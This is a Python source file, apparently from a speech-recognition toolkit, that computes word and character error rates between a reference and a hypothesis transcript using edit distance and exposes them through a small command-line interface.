def wer(ref, hyp, remove_nsns=False):
    """
    Calculate word error rate between two string or time_aligned_text objects

    :param ref: reference "truth" transcript (str or time_aligned_text)
    :param hyp: hypothesis transcript (str or time_aligned_text)
    :param remove_nsns: if True, strip non-silence noises (um, uh, ...) first
    :return: WER as a percentage (float)

    >>> wer("this is a cat", "this is a dog")
    25.0
    """
    # accept time_aligned_text objects too
    ref = _as_text(ref)
    hyp = _as_text(hyp)

    # remove tagged noises and other nonspeech events
    ref = re.sub(re_tagged_nonspeech, " ", ref)
    hyp = re.sub(re_tagged_nonspeech, " ", hyp)

    # optionally, remove non silence noises
    if remove_nsns:
        ref = remove_nonsilence_noises(ref)
        hyp = remove_nonsilence_noises(hyp)

    # clean punctuation, etc.
    ref = clean_up(ref)
    hyp = clean_up(hyp)

    # calculate WER; max(1, ...) guards against division by zero on empty refs
    return (100 * editdistance.eval(ref.split(" "), hyp.split(" ")) /
            max(1, len(ref.split(" "))))


def cer(ref, hyp, remove_nsns=False):
    """
    Calculate character error rate between two strings or time_aligned_text objects

    :param ref: reference "truth" transcript (str or time_aligned_text)
    :param hyp: hypothesis transcript (str or time_aligned_text)
    :param remove_nsns: if True, strip non-silence noises (um, uh, ...) first
    :return: CER as a percentage (float)

    >>> cer("this cat", "this bad")
    25.0
    """
    # accept time_aligned_text objects too
    ref = _as_text(ref)
    hyp = _as_text(hyp)

    if remove_nsns:
        ref = remove_nonsilence_noises(ref)
        hyp = remove_nonsilence_noises(hyp)

    ref = clean_up(ref)
    hyp = clean_up(hyp)

    # calculate per line CER; max(1, ...) guards against division by zero
    return 100 * editdistance.eval(ref, hyp) / max(1, len(ref))


def main():
    """CLI entry point: compare a reference and a transcript file and print WER/CER."""
    parser = argparse.ArgumentParser(
        description=
        "Compares a reference and transcript file and calculates word error rate (WER) between these two files"
    )
    parser.add_argument(
        "reference_file",
        metavar="reference_file",
        type=str,
        help='reference "truth" file',
    )
    parser.add_argument(
        "transcript_file",
        metavar="transcript_file",
        type=str,
        help="transcript possibly containing errors",
    )
    parser.add_argument(
        "--char-level",
        help="calculate character error rate instead of word error rate",
        action="store_true",
    )
    parser.add_argument(
        "--ignore-nsns",
        help="ignore non silence noises like um, uh, etc.",
        action="store_true",
    )

    # parse arguments
    args = parser.parse_args()

    # read files from arguments
    ref = assign_if_valid(args.reference_file)
    hyp = assign_if_valid(args.transcript_file)

    if ref is None or hyp is None:
        print(
            "Error with an input file. Please check all files exist and are accepted by ASRToolkit"
        )
    elif args.char_level:
        print("CER: {:5.3f}%".format(cer(ref, hyp, args.ignore_nsns)))
    else:
        print("WER: {:5.3f}%".format(wer(ref, hyp, args.ignore_nsns)))


if __name__ == "__main__":
    main()
3,787
1,284